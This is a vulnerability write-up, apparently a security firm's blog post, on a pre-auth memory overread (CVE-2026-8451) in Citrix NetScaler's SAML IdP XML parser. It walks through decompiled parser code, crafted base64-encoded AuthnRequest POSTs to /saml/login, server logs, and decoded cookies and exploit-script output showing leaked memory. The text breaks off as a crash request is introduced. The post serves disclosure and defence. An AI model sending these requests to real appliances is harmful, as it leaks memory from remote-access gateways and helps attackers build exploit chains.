Community

Recent bundles

CitrixBleed To Infinity And Beyond (Citrix NetScaler Pre-Auth Memory Overread CVE-2026-8451)

Well, well, well - once again, the cat has dragged us in and spat us out.

Today, we find ourselves questioning the reality we sit within. Must it be so predictable, and why us? “But watchTowr, what do you mean?”

Well, if you’re here, you likely fit into one of the following categories:

  • A dear reader,
  • A group therapy accomplice
  • A Groundhog Day fan club member

Why? Because we once again find ourselves talking about Citrix NetScalers. Yes, that’s right, we’ve found another excuse to create memes and mock promise rings.

For those that don’t start violently wretching when the phrase “Citrix NetScaler” is uttered, we have another word to whisper: “CitrixBleed”.

As many know, the term CitrixBleed now refers to not a single vulnerability, but an entire class of Memory Disclosure-esque vulnerabilities in Citrix NetScaler devices, many of which have played roles in breaches and incidents in recent memory.

For those new to this trauma, the following prior reading may be of interest:

"We told you so”, we want to scream.

Huh? Why? Because, we have constantly reiterated our concern that the Memory Disclosure-esque class of vulnerability appears to be endemic within Citrix NetScaler devices - to the point where we’ve now found further instances either by accident or while analyzing and reproducing another instance of the same vulnerability class in the same appliance a mere few months ago.

Yes, that’s right - today, a Secure By Design promise ring pledge commitment hall-of-famer is back to haunt us as Citrix has now publicly disclosed the zero-day Memory Disclosure vulnerability we reported in March 2026.

We’ve given up counting the numbers, and so we’ve decided to call this vulnerability “CitrixBleed To Infinity And Beyond”:

Referencing what we wrote previously, because it is demonstrably evergreen:

> However, what should be of concern is the bigger picture - the trend, which is very clearly suggesting that memory management continues to appear fragile within Citrix NetScaler appliances, to the extent that even accidentally misconfiguring an appliance can lead to the disclosure of leaked memory.

> It feels like we are playing catch with a highly-sensitive gun that continues to harm innocent bystanders - within, once again, what many will consider a highly-critical appliance and security control.

> Will we see another memory leak vulnerability in Citrix NetScaler? We have no idea. But if we were to meme…

What Is Citrix NetScaler and NetScaler Gateway?

Citrix NetScaler (formally rebranded, then un-rebranded, in the way that only enterprise networking vendors can truly pull off) is a family of application delivery controllers and VPN gateway appliances found in virtually every large enterprise network on the planet. NetScaler handles load balancing, SSL offloading, authentication, and remote access - and NetScaler Gateway specifically serves as the front door for thousands of organizations' remote access infrastructure.

It is, in other words, exactly the kind of product we love to look at, while also being a natural disaster.

What Is CVE-2026-8451?

Citrix eloquently describes CVE-2026-8451 as: “Insufficient input validation leading to memory overread”.

Naturally, they’ve assigned CVE-2026-8451 to the vulnerability and rated it a CVSS of 8.8. Of note is that for this vulnerability to be exploitable, matching CitrixBleed3?4?, the NetScaler appliance has to be configured as a SAML IDP.

Within their advisory, Citrix states the following products are affected:

  • NetScaler ADC and NetScaler Gateway 14.1 BEFORE 14.1-72.61
  • NetScaler ADC and NetScaler Gateway 13.1 BEFORE 13.1-63.18
  • NetScaler ADC FIPS BEFORE 14.1-72.61 FIPS
  • NetScaler ADC FIPS and NDcPP BEFORE 13.1-37.272

Let’s dive in.

Hunting (Unfortunately Not) Rare Vulnerabilities

It was a late night in Pallet Town, and we, the intrepid hero, were searching for rare Pokémon vulnerabilities in the long grass of the Citrix NetScaler.

Doing “what we do best”, back in March we found ourselves feverishly analyzing patches and changes to reproduce CVE-2026-3055 aka CitrixBleed4(?) affecting NetScaler’s configured as an IDP provider.

With a NetScaler up and running, configured as an SAML IdP, we skimmed through relevant attack surface. We say skimmed, because in reality, SAML itself doesn't expose a huge amount of functionality for us to poke prod - effectively a handful of authentication endpoints, and not much else (intended, anyway).

Thus, it seemed natural to start at the beginning: /saml/login.

Anyone familiar with SAML will know that clients kick off authentication by submitting a base64-encoded XML document to an endpoint like this. Buried inside that XML document is an AuthnRequest, which describes everything the identity provider needs to know, including the issuer, destination, timestamps, and a handful of other attributes.

With nothing else to catch our attention, we decided to take what we were given and focus here.

As anyone who has spent time hunting vulnerabilities will tell you, after hopefully recovering, XML parsers are deceptively difficult to implement correctly. Even experienced developers (and others.. that sign pledges…) generally know better to not do anything else except rely on well-tested libraries.

Citrix, however, appears to have chosen a different path. To ensure allegiance to the pledge.

The result is delightful snippets like the following, taken from the code responsible for parsing XML attributes such as foo="bar":

cursor = <some string input>

whitespaceCharList = 0x100002600;

// Skip leading whitespace
for ( lookahead = (v32 + 28); ; lookahead++ )
{
    ch = *cursor;
    if ( ch > '=' )
        break;
    if ( !_bittest64(&whitespaceCharList, ch) )
    {
        if ( ch == '=' )
        {
            while ( 1 )
            {
                ch = *lookahead;
                if ( ch > 0x20 || !_bittest64(&whitespaceCharList, ch) )
                    break;
                ++lookahead;
            }
            cursor = lookahead;
        }
        break;
    }
    ++cursor;
}

// Determine how the value is quoted. This accepts both single and double quotes, or
// no quotes at all (in which case, the value is terminated by whitespace).
if ( ch == '\'' || ch == '"' )
{
    terminator = ch;
    first = *++cursor;
}
else
{
    terminator = ' ';
    first = ch;
}
if ( first == terminator )
    return 0xE0002;     // The value is empty.

// Now walk forward until we find the terminator.
scanPos = cursor;
while ( first != '\0' && first != '>' )
{
    scanPos++;
    first = *scanPos;
    if (first == terminator)
        break
}

if ( scanPos == cursor )
    return 0xE0002;     // the value is empty.

out->value_ptr = cursor;
out->value_len = scanPos - cursor;

The first thing that probably jumps out is the slightly odd-looking _bittest64() call.

Fortunately, it isn't doing anything particularly exotic.

It simply checks whether a character belongs to a predefined set, encoded as bit positions within the constant 0x100002600. In practice, that means it matches the characters 0x09, 0x0A, 0x0D, and 0x20, which correspond to horizontal tab, line feed, carriage return, and space.

There is one subtle detail. ASCII values range from 0 to 255, while the lookup table is only 64 bits wide. The > 0x20 check exists to avoid indexing beyond the end of that table.

The comments should make the rest of the function fairly easy to follow. Its job is simply to locate the value portion of an XML attribute and return both a pointer to the value and its length.

It also looks... a little questionable. If your promise ring isn’t reverberating yet, you should probably charge it. As we’ve regularly seen and been forced to dea with, string parsing code has a habit of hiding subtle bugs - and surprise, this implementation has a few characteristics that immediately made us suspicious.

For example, there are no obvious bounds checks. If the input is malformed enough, it looks entirely possible for the parser to read past the end of the input buffer. What happens if an attribute value is never terminated?

But things get even stranger when you look at the parser's termination logic.

Throughout most of the function, _bittest64() is used to recognize the characters that terminate a value. However, there is one special case: unquoted attribute values.

In that path, whitespace is no longer treated as a terminator. Instead, the parser only stops when it encounters a null byte, a closing >, or the matching quote character.

That difference might seem insignificant, but it turns out to matter quite a bit (no way!).

A Wild NetScaler Appears! watchTowr used “Mean Look To See If It Falls Over”.

Having seen the quality of XML parsers in general, let alone Citrix’s track record that we’ve already discussed, we did what anyone would do - we let our small pets walk across our keyboards, and watched for unexpected intended functionality.

Fortunately, NetScaler makes this fairly easy (we supplied the pets).

A quick shell command drops you into the underlying operating system, where you can simply tail the relevant log file:

/var/log/ns.log

That gives us a front-row seat to exactly how the parser interprets our input.

We'll start with a minimal SAML AuthnRequest. It gives us a clean baseline before we begin progressively breaking things and observing how the parser responds:

<samlp:AuthnRequest 
    xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" 
    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" 
    ID="_99d3e71118f42305e05acb14ad0bd917" 
    Version="2.0" 
    ProviderName="SP test" 
    Destination="<http://idp.example.com/SSOService.php>" 
    ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" 
    AssertionConsumerServiceURL="<http://sp.example.com/demo1/index.php?acs>">
    <saml:Issuer><http://sp.example.com/demo1/metadata.php></saml:Issuer>
    <samlp:NameIDPolicy Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress" AllowCreate="true"/>
    <samlp:RequestedAuthnContext Comparison="exact">
    <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
    </samlp:RequestedAuthnContext>
</samlp:AuthnRequest>

After base64-encoding the request and sending it, we keep one eye on the logs and one eye on the debugger. As expected, NetScaler parses each of the values correctly:

POST /saml/login HTTP/1.1
Host: all-ur-boxen.com
Content-Length: 1090

SAMLRequest=PHNhbWxwOkF1dGhuUmVxdWVzdCAKCXhtbG5zOnNhbWxwPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6cHJvdG9jb2wiIAoJeG1sbnM6c2FtbD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFzc2VydGlvbiIgCglJRD0iXzk5ZDNlNzExMThmNDIzMDVlMDVhY2IxNGFkMGJkOTE3IiAKCVZlcnNpb249IjIuMCIgCglQcm92aWRlck5hbWU9IlNQIHRlc3QiIAoJRGVzdGluYXRpb249Imh0dHA6Ly9pZHAuZXhhbXBsZS5jb20vU1NPU2VydmljZS5waHAiIAoJUHJvdG9jb2xCaW5kaW5nPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YmluZGluZ3M6SFRUUC1QT1NUIiAKCUFzc2VydGlvbkNvbnN1bWVyU2VydmljZVVSTD0iaHR0cDovL3NwLmV4YW1wbGUuY29tL2RlbW8xL2luZGV4LnBocD9hY3MiPgoJPHNhbWw6SXNzdWVyPmh0dHA6Ly9zcC5leGFtcGxlLmNvbS9kZW1vMS9tZXRhZGF0YS5waHA8L3NhbWw6SXNzdWVyPgoJPHNhbWxwOk5hbWVJRFBvbGljeSBGb3JtYXQ9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjEuMTpuYW1laWQtZm9ybWF0OmVtYWlsQWRkcmVzcyIgQWxsb3dDcmVhdGU9InRydWUiLz4KCTxzYW1scDpSZXF1ZXN0ZWRBdXRobkNvbnRleHQgQ29tcGFyaXNvbj0iZXhhY3QiPgoJPHNhbWw6QXV0aG5Db250ZXh0Q2xhc3NSZWY%2bdXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFjOmNsYXNzZXM6UGFzc3dvcmRQcm90ZWN0ZWRUcmFuc3BvcnQ8L3NhbWw6QXV0aG5Db250ZXh0Q2xhc3NSZWY%2bCgk8L3NhbWxwOlJlcXVlc3RlZEF1dGhuQ29udGV4dD4KPC9zYW1scDpBdXRoblJlcXVlc3Q%2b

The HTTP response is just a 302 (honestly, it��s contents are not particularly interesting, so we have omitted them):

HTTP/1.1 302 Object Moved
Location: /vpn/index.html
Set-Cookie: NSC_TASS=YXNkZgBJRD1fOTlkM2U3MTExOGY0MjMwNWUwNWFjYjE0YWQwYmQ5MTcmYmluZD1wb3N0JkFDU1VSTD1odHRwOi8vc3AuZXhhbXBsZS5jb20vZGVtbzEvaW5kZXgucGhwP2FjcwA=;HttpOnly;Path=/;Secure
Content-Security-Policy: default-src 'self'; script-src 'self'; connect-src 'self'; img-src <http://localhost>:* 'self' data:; style-src 'self' 'unsafe-inline'; font-src 'self' data:; frame-src 'self'; child-src 'self' com.citrix.agmacepa://* citrixng://* com.citrix.nsgclient://* vmware-view:// nsgcepa://nsgcepa application://*; form-action  'self'; object-src 'none'; base-uri 'self'; report-uri /nscsp_violation/report_uri
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_EPAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_USER=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_BASEURL=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CsrfToken=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CtxsAuthId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: ASP.NET_SessionId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TMAA=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_TMAS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 398
Cache-control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8

&lt;html&gt;&lt;head&gt;&lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"&gt;&lt;script type="text/javascript" src="/vpn/resources.js"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="/vpn/init/redirection_body_resources.js"&gt;&lt;/script&gt;&lt;/head&gt;&lt;body&gt;&lt;span id="This object may be found "&gt;&lt;/span&gt;<a href="/vpn/index.html">&lt;span id="here"&gt;&lt;/span&gt;</a>&lt;span id="Trailing phrase after here"&gt;&lt;/span&gt;&lt;/body&gt;&lt;/html&gt;

And in our friendly logs….:

AuthnReq start tag parsed, id=&lt;_99d3e71118f42305e05acb14ad0bd917&gt;, 
acs=&lt;http://sp.example.com/demo1/index.php?acs&gt;, forceAuth=&lt;0&gt;, binding=&lt;POST&gt;, 
following data  "    ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"        AssertionConsumerServiceURL=""

So far, nothing particularly surprising. NetScaler successfully extracts the ID and AssertionConsumerServiceURL attributes, while ForceAuthn falls back to its default value.

However, we were still deeply suspicious of the attribute parser. Earlier, we pointed out that unquoted attribute values are terminated differently from quoted ones. With not much faith left in humanity, we wondered what would happen if we used a newline to terminate one.

There was only one way to find out - yes, the pets were asked to walk across our keyboards, again.

&lt;samlp:AuthnRequest Version="2.0" AssertionConsumerServiceURL=11
id=22&gt;
&lt;saml:Issuer&gt;watchtowr&lt;/saml:Issuer&gt;
&lt;/samlp:AuthnRequest&gt;

This time, we've replaced the space after AssertionConsumerServiceURL with a newline.

Once again, we base64-encode the document and POST it to /saml/login:

POST /saml/login HTTP/1.1
Host: 192.168.80.125
Content-Length: 190

SAMLRequest=PHNhbWxwOkF1dGhuUmVxdWVzdCBWZXJzaW9uPSIyLjAiIEFzc2VydGlvbkNvbnN1bWVyU2VydmljZVVSTD0xMQppZD0yMj4KPHNhbWw6SXNzdWVyPndhdGNodG93cjwvc2FtbDpJc3N1ZXI%2bCjwvc2FtbHA6QXV0aG5SZXF1ZXN0Pg==

The response is practically the same as before:

HTTP/1.1 302 Object Moved
Location: /vpn/index.html
Set-Cookie: NSC_TASS=YXNkZgBJRD0yMiZiaW5kPXBvc3QmQUNTVVJMPTExCmlkPTIyAA==;HttpOnly;Path=/;Secure
Content-Security-Policy: default-src 'self'; script-src 'self'; connect-src 'self'; img-src &lt;http://localhost&gt;:* 'self' data:; style-src 'self' 'unsafe-inline'; font-src 'self' data:; frame-src 'self'; child-src 'self' com.citrix.agmacepa://* citrixng://* com.citrix.nsgclient://* vmware-view:// nsgcepa://nsgcepa application://*; form-action  'self'; object-src 'none'; base-uri 'self'; report-uri /nscsp_violation/report_uri
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_EPAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_USER=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_BASEURL=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CsrfToken=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CtxsAuthId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: ASP.NET_SessionId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TMAA=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_TMAS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 398
Cache-control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8

&lt;html&gt;&lt;head&gt;&lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"&gt;&lt;script type="text/javascript" src="/vpn/resources.js"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="/vpn/init/redirection_body_resources.js"&gt;&lt;/script&gt;&lt;/head&gt;&lt;body&gt;&lt;span id="This object may be found "&gt;&lt;/span&gt;<a href="/vpn/index.html">&lt;span id="here"&gt;&lt;/span&gt;</a>&lt;span id="Trailing phrase after here"&gt;&lt;/span&gt;&lt;/body&gt;&lt;/html&gt;

With the log file… not being so coy:

AuthnReq start tag parsed, id=&lt;22&gt;, acs=&lt;11 id=22&gt;, forceAuth=&lt;0&gt;, binding=&lt;Unknown&gt;, 
following data  Version="2.0" AssertionConsumerServiceURL=11 id=22&gt; &lt;saml:Issuer&gt;watchtowr&lt;/saml:Issuer&gt; &lt;/samlp:Au"

That's... interesting.

You might have to read the log twice before it jumps out at you.

Notice that the acs value has been parsed as:

11 id=22

That is clearly wrong. Looking at the XML we sent, the value should simply be 11.

Instead, the parser has read past the correct end of the attribute, failed to recognize the newline as a valid terminator (exactly as we suspected), and continued consuming input until it eventually encountered the &gt; terminating the AuthnRequest start tag.

Then, things became even more interesting.

As we saw earlier, this XML parser is surprisingly relaxed about what constitutes a valid closing tag. In particular, it is happy to accept a &lt; as the terminator for an AuthnRequest start tag instead of the expected &gt;.

That means we can take things one step further. If we terminate both AssertionConsumerServiceURL and ID with newlines, and leave the opening AuthnRequest tag unclosed, we end up with the following request:

&lt;samlp:AuthnRequest Version="2.0" AssertionConsumerServiceURL=
id=
&lt;saml:Issuer&gt;watchtowr&lt;/saml:Issuer&gt;
&lt;/samlp:AuthnRequest&gt;

Let’s base64 and send it on its way:

POST /saml/login HTTP/1.1
Host: 192.168.80.125
Content-Length: 180

SAMLRequest=PHNhbWxwOkF1dGhuUmVxdWVzdCBWZXJzaW9uPSIyLjAiIEFzc2VydGlvbkNvbnN1bWVyU2VydmljZVVSTD0KaWQ9CjxzYW1sOklzc3Vlcj53YXRjaHRvd3I8L3NhbWw6SXNzdWVyPgo8L3NhbWxwOkF1dGhuUmVxdWVzdD4=

The response is, again, uninteresting:

HTTP/1.1 302 Object Moved
Location: /vpn/index.html
Set-Cookie: NSC_TASS=YXNkZgBJRD08c2FtbDpJc3N1ZXImYmluZD1wb3N0JkFDU1VSTD1pZD0KPHNhbWw6SXNzdWVyAA==;HttpOnly;Path=/;Secure
Content-Security-Policy: default-src 'self'; script-src 'self'; connect-src 'self'; img-src &lt;http://localhost&gt;:* 'self' data:; style-src 'self' 'unsafe-inline'; font-src 'self' data:; frame-src 'self'; child-src 'self' com.citrix.agmacepa://* citrixng://* com.citrix.nsgclient://* vmware-view:// nsgcepa://nsgcepa application://*; form-action  'self'; object-src 'none'; base-uri 'self'; report-uri /nscsp_violation/report_uri
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_EPAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_USER=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_BASEURL=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CsrfToken=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: CtxsAuthId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: ASP.NET_SessionId=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TMAA=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_TMAS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT;Secure
Set-Cookie: NSC_TEMP=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_PERS=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
Set-Cookie: NSC_AAAC=xyz;Path=/;expires=Wednesday, 09-Nov-1999 23:12:40 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 398
Cache-control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8

&lt;html&gt;&lt;head&gt;&lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"&gt;&lt;script type="text/javascript" src="/vpn/resources.js"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="/vpn/init/redirection_body_resources.js"&gt;&lt;/script&gt;&lt;/head&gt;&lt;body&gt;&lt;span id="This object may be found "&gt;&lt;/span&gt;<a href="/vpn/index.html">&lt;span id="here"&gt;&lt;/span&gt;</a>&lt;span id="Trailing phrase after here"&gt;&lt;/span&gt;&lt;/body&gt;&lt;/html&gt;

.. but the generated log is far from boring:


AuthnReq start tag parsed, id=&lt;&lt;saml:Issuer&gt;, acs=&lt;id= &lt;saml:Issuer&gt;, 
forceAuth=&lt;0&gt;, binding=&lt;Unknown&gt;, following data  Version="2.0" AssertionConsumerServiceURL= id= &lt;saml:Issuer&gt;watchtowr&lt;/saml:Issuer&gt; &lt;/samlp:AuthnRe"

So far, our theory holds up.

The AssertionConsumerServiceURL value is not terminated at the newline. Instead, the parser keeps reading until it encounters the &gt; from the closing Issuer tag. The ID attribute behaves exactly the same way.

At this point, it is pretty clear that we have an overread. The parser is reading well beyond the intended bounds of each attribute value. We are still only reading XML that happens to be present in the input buffer, but the parser is clearly consuming far more data than it should.

That is already interesting, but the obvious question is: “Do we lease our bug-hunting pets?” Sometimes.

The other question you may be inclined to ask, may resemble the following: “Where does all of this overread data end up?

To answer that, we need to look at what this function actually produces.

On success, it returns an HTTP response containing an NSC_TASS cookie. Among other things, this cookie stores the ID and AssertionConsumerServiceURL values that were parsed from the incoming XML request:

NSC_TASS=YXNkZgBJRD08c2FtbDpJc3N1ZXImYmluZD1wb3N0JkFDU1VSTD1pZD0KPHNhbWw6SXNzdWVyAA==

This decodes to:

00000000  61 73 64 66 00 49 44 3d  3c 73 61 6d 6c 3a 49 73  |asdf.ID=&lt;saml:Is|
00000010  73 75 65 72 26 62 69 6e  64 3d 70 6f 73 74 26 41  |suer&amp;bind=post&amp;A|
00000020  43 53 55 52 4c 3d 69 64  3d 0a 3c 73 61 6d 6c 3a  |CSURL=id=.&lt;saml:|
00000030  49 73 73 75 65 72 00                              |Issuer.|

asdf is simply the configured provider name. The interesting part is everything that follows.

You can see the values parsed from our XML request being embedded directly into the cookie. The ID field now contains &lt;saml:Issuer, and the ACSURL field has similarly consumed data well beyond the intended attribute value.

Shock - we are once again miserable about the world (we say, fiddling with our promise rings).

We’ve so far demonstrated what nobody needed a crystal ball to predict - the NetScaler appliance is willing to return data it never should have associated with those attributes. So far, though, the overread is still confined to our own request buffer.

The next challenge is obvious: instead of reading within the request, can we make it read beyond the end of the request?

Reading Into The Unknown

We spent quite a while trying to figure out how to push the parser past the end of the request buffer. After a healthy amount of trial and error, we concluded that our login request to /saml/login needed to satisfy a few conditions:

  • It must contain both a &lt;samlp:AuthnRequest&gt; and a corresponding &lt;/samlp:AuthnRequest&gt;. We can't simply leave the request unterminated.
  • It must contain a valid &lt;saml:Issuer&gt;watchtowr&lt;/saml:Issuer&gt;.
  • It must contain either an AssertionConsumerServiceURL= or ID attribute terminated by a newline, or not terminated at all.

At first glance, those requirements seem mutually exclusive.

They aren't.

By this point, we'd already learned just how forgiving the parser was. We'd shown that the opening AuthnRequest tag didn't actually need a closing &gt;, but we also discovered something even stranger: the parser was surprisingly relaxed about element nesting.

For example:

&lt;samlp:AuthnRequest Version="2.0" AssertionConsumerServiceURL=11
id=22
&lt;/samlp:AuthnRequest&gt;
&lt;saml:Issuer&gt;watchtowr&lt;/saml:Issuer&gt;

Here we’ve got the same request as before - but this time, the Issuer is moved outside the AuthnRequest.

Any sane parser would reject this, but we’re not dealing with sanity. Of course, the NetScaler appliance actually accepts it.

AuthnReq start tag parsed, id=&lt;22 &lt;saml:Issuer&gt;, acs=&lt;11 id=22 &lt;saml:Issuer&gt;, forceAuth=&lt;0&gt;, binding=&lt;Unknown&gt;

One important detail is that this only works if the opening AuthnRequest tag is left unterminated. If it is closed normally, the parser rejects the document, strongly suggesting the behavior we’re observing is tied to the parser's attribute-handling logic.

Once we realized that, we started experimenting a little more. It turns out the parser is surprisingly tolerant of attribute ordering as well. For example:

&lt;samlp:AuthnRequest
&lt;saml2:issuer&gt;watchtowr&lt;/saml2:issuer&gt;
&lt;/samlp:AuthnRequest&gt;
Version="2.0"
id="11"
AssertionConsumerServiceURL="22"

This yields a successful response - although the extracted details are incorrect:

AuthnReq start tag parsed, id=&lt;&gt;, acs=&lt;22&gt;, forceAuth=&lt;0&gt;, binding=&lt;Unknown&gt;

You might note that the acs value returned is correct - 22 - because we’ve carefully enclosed the value in the request in quotes.

What happens if we can make the parser overread past the end of the request buffer instead?

&lt;samlp:AuthnRequest
&lt;saml2:issuer&gt;watchtowr&lt;/saml2:issuer&gt;
&lt;/samlp:AuthnRequest&gt;
Version="2.0"
id="11"
AssertionConsumerServiceURL=

And in our favorite log…:

AuthnReq start tag parsed, id=&lt;&gt;, acs=&lt;▒^M▒ᆳ▒="2.0" id="11" 
AssertionConsumerServiceURL="22"ᆳ▒mple.com/demo1/index.php&lt;/saml:Issuer&gt;, 
forceAuth=&lt;0&gt;, binding=&lt;Unknown&gt;

OH HO HO. Finally, we’re almost there!

The parser is no longer just reading extra XML. It's pulling arbitrary binary data from beyond the end of the XML buffer and happily appending it to the parsed value.

The only question left is whether that value makes it all the way back to us via the NSC_TASS cookie we looked at earlier:

NSC_TASS=YXNkZgBJRD0mYmluZD1wb3N0JkFDU1VSTD3wDZDvvq3ePSIyLjAiCmlkPSIxMSIKQXNzZXJ0aW9uQ29uc3VtZXJTZXJ2aWNlVVJMPSIyMiLvvq3ebXBsZS5jb20vZGVtbzEvaW5kZXgucGhwPC9zYW1sOklzc3VlcgA=

And decoded…:

00000000  61 73 64 66 00 49 44 3d  26 62 69 6e 64 3d 70 6f  |asdf.ID=&amp;bind=po|
00000010  73 74 26 41 43 53 55 52  4c 3d f0 0d 90 ef be ad  |st&amp;ACSURL=......|
00000020  de 3d 22 32 2e 30 22 0a  69 64 3d 22 31 31 22 0a  |.="2.0".id="11".|
00000030  41 73 73 65 72 74 69 6f  6e 43 6f 6e 73 75 6d 65  |AssertionConsume|
00000040  72 53 65 72 76 69 63 65  55 52 4c 3d 22 32 32 22  |rServiceURL="22"|
00000050  ef be ad de 6d 70 6c 65  2e 63 6f 6d 2f 64 65 6d  |....mple.com/dem|
00000060  6f 31 2f 69 6e 64 65 78  2e 70 68 70 3c 2f 73 61  |o1/index.php&lt;/sa|
00000070  6d 6c 3a 49 73 73 75 65  72 00                    |ml:Issuer.|

Finally!

Take a look at the ACSURL value. It now contains binary data that should never have been returned to us, including the unmistakable 0xdeadbeef fill pattern.

Our overread has worked.

The parser has read beyond the end of the XML buffer, and we've successfully tricked NetScaler into returning memory that was never supposed to leave the process. Completely unpredictably.

It’s never done that before (lol)

One thing we’re keen to note: in contrast to the original CVE-2026-0050, in which kilobytes of binary data can be leaked, this overread will terminate the out-of-bounds read when various control characters are read, such as NULL (or even &gt;).

In practice, we found that by varying the request length, we could consistently squeeze a few bytes out of the server:

c:\&gt;python watchTowr-vs-Netscaler-CVE-2026-8451.py &lt;https://192.168.80.125&gt;
..
Leaked bytes:
00000000  f0 0d 90 de de de de de de de de de de de de de   |................|
00000010  de de de de de de de de de de de de de de de de   |................|
00000020  de de de de de de de de de de de de de de de de   |................|
00000030  de de de de de de de de de de de de de de de de   |................|
00000040  de de de de de de de de de de de de de de ed a7   |................|
00000050  0c a1 35 00                                       |..5.|
..

There’s clearly data leaking here (0xf00d!) and, interestingly, what appears to be a data pointer (0xa10ca7ed).

We can't say with certainty what this pointer references, but it certainly looks plausible. If it is a valid process pointer, then this bug graduates from a simple information disclosure to a genuine infoleak primitive. Paired with a suitable memory corruption vulnerability, it could be exactly the kind of building block needed for a full device compromise.

Of course, if you're more interested in demonstrating impact than building exploit chains, there is a much easier route, as naturally in enterprise-grade security appliances, requests as simple as the following are enough to reliably crash the target system:

